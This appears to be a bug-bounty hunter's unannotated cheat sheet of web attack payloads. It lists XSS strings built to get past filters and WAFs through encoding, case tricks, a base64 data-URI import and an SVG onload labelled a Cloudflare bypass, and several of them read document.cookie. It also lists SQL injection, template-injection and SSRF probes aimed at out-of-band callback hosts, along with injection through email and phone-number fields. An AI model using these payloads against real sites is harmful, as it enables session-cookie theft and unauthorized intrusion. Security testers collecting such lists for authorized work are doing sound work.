xss 1
javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
bypass block of single quote '?url=home%26apos;-alert(1)//onclick="location='/home'-alert(1)//'"
bypass block of colon :?url=javascript%26colon;alert(1)href="javascript:alert(1)”
</base</sTyle/</scRIpt/</textArea/</noScript/</tiTle/--><h1/
<image/onerror="import('data:application/javascript;charset=utf-8;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKTtjb25zb2xlLmxvZyhkb2N1bWVudC5kb21haW4pOy8v')//%27"src>

#"></div><a href= javascript:alert(document.domain)
/?url=http://me6.com/aem/xss2.svg
/;/;/resource/md/get/url?url=http://oast.pro
\u003e\u003cimg src=1
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
onerror=alert(9)\u003e
AutoFocus/>/OnFocus=top?."ale"+"rt"/
<s\Cr\ipt\>alert(document\.cookie)<\/s\Cr\ipt\>\;\/>
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
❌<details/open=/Open/href=/data=+ontoggle="(alert)(document.domain)
automated xss <img/src="x"/onerror=prompt()>
' OR 1=1
login email
["');alert('XSS');//"]@xyz.xxx
test@gmail.com%27%22%3E%3Csvg/onload=alert(/xss/)%3E
12345-abc-1-23456<script>alert(document.cookie)<%2Fscript>.img
phone no field xss
XSs - +441134960000;phone-context=alert(0)
Parameter pollution (1) - +441134960000;phone-context=&phone-context=+442..
Parameter pollution (2) - +441134960000;ext=1;ext=?
SQL injection +441134960000;phone-context=' OR 1=1; --
Template injection +441134960000;phone-context={{22}}[ [33]]{{77}}{77}{7*’7}
SSRF +441134960000;phone-context=http://burocoaborator.net
Twitter famous
HackerOne report to find xss
%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E http://host/path/to/image'onerror=alert(1);//.png
c panel
Last updated